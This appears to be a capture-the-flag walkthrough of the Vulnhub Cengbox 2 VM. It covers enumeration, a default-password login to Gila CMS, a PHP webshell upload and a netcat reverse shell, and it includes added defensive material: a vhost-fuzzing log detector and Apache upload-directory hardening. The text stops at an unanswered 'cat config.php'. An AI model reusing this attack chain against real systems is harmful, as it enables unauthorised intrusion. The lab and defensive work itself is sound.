ToB Enterprise Services App Market: ToB review and business social-networking industry platform
Title: Vulnhub Cengbox 2 box: detailed testing process (privilege escalation using different methods)
Author: 风雨同行
Date: 2023-6-23 16:44
Cengbox 2
Identify the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:03 1 60 Unknown vendor
192.168.56.100 08:00:27:ea:c7:5b 1 60 PCS Systemtechnik GmbH
192.168.56.254 08:00:27:ee:62:de 1 60 PCS Systemtechnik GmbH
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-22 20:09 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.253
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
| 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:EE:62:DE (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ ftp 192.168.56.254
Connected to 192.168.56.254.
220 (vsFTPd 3.0.3)
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||56112|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 119 4096 May 23 2020 .
drwxr-xr-x 2 0 119 4096 May 23 2020 ..
-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||5618|)
150 Opening BINARY mode data connection for note.txt (209 bytes).
100% |****************************************************************************************************************| 209 488.28 KiB/s 00:00 ETA
226 Transfer complete.
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat note.txt
Hey Kevin,
I just set up your panel and used default password. Please change them before any hack.
I try to move site to new domain which name is ceng-company.vm and also I created a new area for you.
Aaron
Domain: ceng-company.vm
Possible usernames: kevin, aaron
Other: kevin's password is probably weak (the note says a default password was left in place)
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ curl http://192.168.56.254
<!doctype html>
<title>Site Maintenance</title>
<article>
<h1>Site Maintenance</h1>
<p>Sorry, We don't serve yet. You can check later the site. Regards </p> <p>— Ceng Company Team</p>
</article>
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
However, visiting the domain ceng-company.vm returns the same page content as the IP address did.
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://ceng-company.vm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.js,.sh
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://ceng-company.vm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,html,txt,js,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:17:02 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 555]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/.html (Status: 403) [Size: 295]
/.php (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 303]
Progress: 1320683 / 1323366 (99.80%)
The directory scan turned up nothing useful; is there a subdomain? Fuzz the Host header and hide the baseline response (76 words) with --hw 76:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ wfuzz -c -u 'ceng-company.vm' -H 'Host:FUZZ.ceng-company.vm' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 76
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case sensative list, where entries were found"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 400 12 L 53 W 422 Ch "# on atleast 2 different hosts"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000002: 400 12 L 53 W 422 Ch "#"
000000004: 400 12 L 53 W 422 Ch "#"
000000259: 403 11 L 32 W 296 Ch "admin"
The admin subdomain was found; it returns status code 403 (the 400 responses are the wordlist's comment lines, which are not valid Host values).
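From the defender's side, the wfuzz run above leaves a very recognisable trace: one client IP requests the same path over and over with a different Host header each time, and many of those values are junk (wordlist comment lines) that Apache answers with 400. The script below is an added example, not part of the original write-up, that flags this pattern in an Apache access log. It assumes a custom LogFormat with the Host header quoted at the start of each line (shown in the comment); the log lines it runs on are constructed for the example and do not come from the box.

```python
"""Flag clients that cycle through many Host header values in a short
window, the traffic pattern produced by virtual-host fuzzing.
Added example; not part of the original write-up."""
import re
from collections import defaultdict
from datetime import datetime

# Assumed Apache LogFormat, with the Host header quoted so values that
# contain spaces (wordlist comment lines produce exactly those) still parse:
#   LogFormat "\"%{Host}i\" %h %l %u %t \"%r\" %>s %b" host_combined
LINE_RE = re.compile(
    r'^"(?P<host>[^"]*)" (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
    ev["status"] = int(ev["status"])
    return ev


def find_vhost_fuzzing(lines, window_seconds=60, min_distinct_hosts=10):
    """Per client IP, slide a time window over its requests and report the
    first window in which it asked for at least min_distinct_hosts
    different Host values. Returns a list of findings (empty if none)."""
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev:
            by_ip[ev["ip"]].append(ev)
    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            hosts = set()
            for ev in evs[i:]:
                if (ev["ts"] - start["ts"]).total_seconds() > window_seconds:
                    break
                hosts.add(ev["host"])
            if len(hosts) >= min_distinct_hosts:
                findings.append({"ip": ip, "distinct_hosts": len(hosts),
                                 "first_seen": start["ts"].isoformat()})
                break  # one finding per client is enough
    return findings


# --- constructed sample log (made up for this example) -------------------
def _line(host, ip, second, status):
    return (f'"{host}" {ip} - - [22/Jun/2023:20:40:{second:02d} -0400] '
            f'"GET / HTTP/1.1" {status} 555')


# Normal browsing from one client: the same Host value every time.
SAMPLE_LINES = [_line("ceng-company.vm", "192.168.56.10", s, 200)
                for s in (1, 5, 9)]
# Fuzzer: a new Host value on every request, a few seconds apart; comment
# lines from the wordlist get a 400, unknown names fall to the default vhost.
FUZZ_WORDS = ["# directory-list-2.3-medium.txt", "#", "images", "download",
              "2006", "news", "crack", "serial", "warez", "full", "12", "admin"]
for n, word in enumerate(FUZZ_WORDS):
    status = 400 if word.startswith("#") else (403 if word == "admin" else 200)
    SAMPLE_LINES.append(_line(word, "192.168.56.253", 10 + n, status))

if __name__ == "__main__":
    for f in find_vhost_fuzzing(SAMPLE_LINES):
        print(f"{f['ip']}: {f['distinct_hosts']} distinct Host values "
              f"starting {f['first_seen']}")
```

The threshold and window are starting points: a busy reverse proxy that legitimately fronts dozens of names will need a higher threshold, while a pure bump in 400 responses from one source is a cheaper first signal that the same data supports.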
Add this subdomain to the /etc/hosts file:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.254 ceng-company.vm
192.168.56.254 admin.ceng-company.vm
Visiting admin.ceng-company.vm returns "Forbidden"; let's scan its directories:
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://admin.ceng-company.vm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: js,php,html,txt,bak,sh
[+] Timeout: 10s
===============================================================
2023/06/22 20:31:01 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/.html (Status: 403) [Size: 301]
/.php (Status: 403) [Size: 300]
/server-status (Status: 403) [Size: 309]
/gila (Status: 301) [Size: 329] [--> http://admin.ceng-company.vm/gila/]
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ gobuster dir -u http://admin.ceng-company.vm/gila/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.bak,.sh,.js
===============================================================
Finally found the login entry point.
Try the username kevin@ceng-company.vm with the password admin.
Upload shell.php; it turns out to be saved in the assets directory.
Visit the following URL:
http://admin.ceng-company.vm/gila/assets/shell.php
A shell is obtained successfully:
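The step that turned an upload into code execution is that the web server was willing to run a .php file from the upload directory. As an added example (not configuration from the box or from Gila CMS), here is the weak setting beside the corrected one for Apache 2.4 with mod_php; the directory path is assumed from the /var/www/admin/gila location seen later in the write-up, and only one of the two blocks would be present in a real config.

```apache
# Weak: assets/ is served like any other directory, so a .php file that the
# upload feature writes there is executed by mod_php on the next GET.
<Directory "/var/www/admin/gila/assets">
    Require all granted
</Directory>

# Hardened: uploads are data, not code. Switch the PHP engine off for the
# directory, detach script handlers, and refuse to serve script-like names
# at all, so even a file that slips past the upload filter is inert.
<Directory "/var/www/admin/gila/assets">
    Require all granted
    Options -ExecCGI -Indexes
    php_admin_flag engine off
    RemoveHandler .php .phtml .phar
    <FilesMatch "\.(php|phtml|phar|php[0-9]|cgi|pl|sh)$">
        Require all denied
    </FilesMatch>
</Directory>
```

With php-fpm instead of mod_php, php_admin_flag is not available; the FilesMatch deny and a ProxyPassMatch/SetHandler that excludes the upload directory cover the same ground. Keeping uploads outside the document root entirely, and serving them through a handler that forces a safe Content-Type, removes the problem rather than filtering it.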
┌──(kali㉿kali)-[~/Vulnhub/Cengbox2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.253] from (UNKNOWN) [192.168.56.254] 40688
Linux cengbox 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
17:39:51 up 34 min, 0 users, load average: 1.04, 4.65, 3.25
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cengbox:/$ cd /home
cd /home
www-data@cengbox:/home$ ls -alh
ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K May 23 2020 .
drwxr-xr-x 23 root root 4.0K May 23 2020 ..
drwxr-x--- 4 mitnick developers 4.0K May 25 2020 mitnick
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 swartz
www-data@cengbox:/home$ cd mitnick
cd mitnick
bash: cd: mitnick: Permission denied
www-data@cengbox:/home$ cd swartz
cd swartz
www-data@cengbox:/home/swartz$ ls -alh
ls -alh
total 44K
drwxr-xr-x 4 swartz swartz 4.0K May 26 2020 .
drwxr-xr-x 4 root root 4.0K May 23 2020 ..
-rw------- 1 swartz swartz 1 May 26 2020 .bash_history
-rw-r--r-- 1 swartz swartz 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 swartz swartz 3.7K Aug 31 2015 .bashrc
drwx------ 2 swartz swartz 4.0K May 23 2020 .cache
drwx------ 2 swartz developers 4.0K May 26 2020 .gnupg
-rw------- 1 swartz developers 1 May 26 2020 .php_history
-rw-r--r-- 1 swartz swartz 655 May 16 2017 .profile
-rw------- 1 swartz developers 1 May 26 2020 .viminfo
-rwxr-xr-x 1 swartz swartz 20 May 26 2020 runphp.sh
www-data@cengbox:/home/swartz$ cat runphp.sh
cat runphp.sh
#!/bin/bash
php -a
www-data@cengbox:/home/swartz$
www-data@cengbox:/var/www/admin/gila$ cat config.php
cat config.php